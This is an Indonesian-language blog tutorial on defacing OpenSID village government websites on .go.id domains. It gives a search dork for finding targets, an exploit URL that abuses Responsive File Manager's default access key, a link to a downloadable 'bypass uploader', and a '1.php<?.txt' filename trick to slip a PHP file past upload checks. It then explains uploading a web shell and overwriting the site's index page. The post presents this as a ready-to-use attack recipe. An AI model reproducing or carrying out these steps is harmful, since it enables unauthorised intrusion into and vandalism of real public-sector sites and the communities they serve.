Tutorial deface POC RFM OPEN SID upload shell tebas index

byCodeXploiter
0

 Assalamualaikum balik lagi bersama saya Admin yang Gans :v




Kali ini saya akan membuat tutorial deface POC RFM OPEN SID upload shell tebas index ya 


Ok langsung aja


1. Dork : OpenSid desa"namaDesaLo"site:.go.id


2.Xploit nya : /assets/filemanager/dialog.php?akey=GantiKunciDesa


3.Uploader Bypass : https://www.mediafire.com/file/rpflfickv7ldcjf/uploader.php/file

Salin aja link di atas terus download uploader nya 


4.shell kalian + script deface kalian Ga ada? Cari di google banyak


Ok yang pertama seperti biasanya kita dork dulu





Nah terus cari web yang vuln  contohnya kalo vuln seperti gambar di bawah ini




Nah oke Sekarang kita up uploader bypass tadi oh iya nama file uploader nya ubahin ke 1.php<?.txt 


Nah kalo udah ke upload kalian pencet "Return to Files list"


Nah skrng tinggal kita panggil uploader nya : cara manggilnya? Https://namadesa/desa/upload/media/1.php



Nah berhasil kan manggil uploader nya skrng kita up Shell kita



Nah udah ke up Shell nya cara manggilnya? Sama seperti tadi https://namadesa/desa/upload/media/K*n*l.php Sorry gw blur soalnya ga enak di liat :v




Dan Boom!! Berhasil up Shell nah seperti biasanya langsung kita tebas aja

Hasil


Ok Segitu aja ya Tutorial kali ini selamat mencoba semoga berhasil sayonara >//<

Jangan lupa share juga:v

Posting Komentar

Lebih baru Lebih lama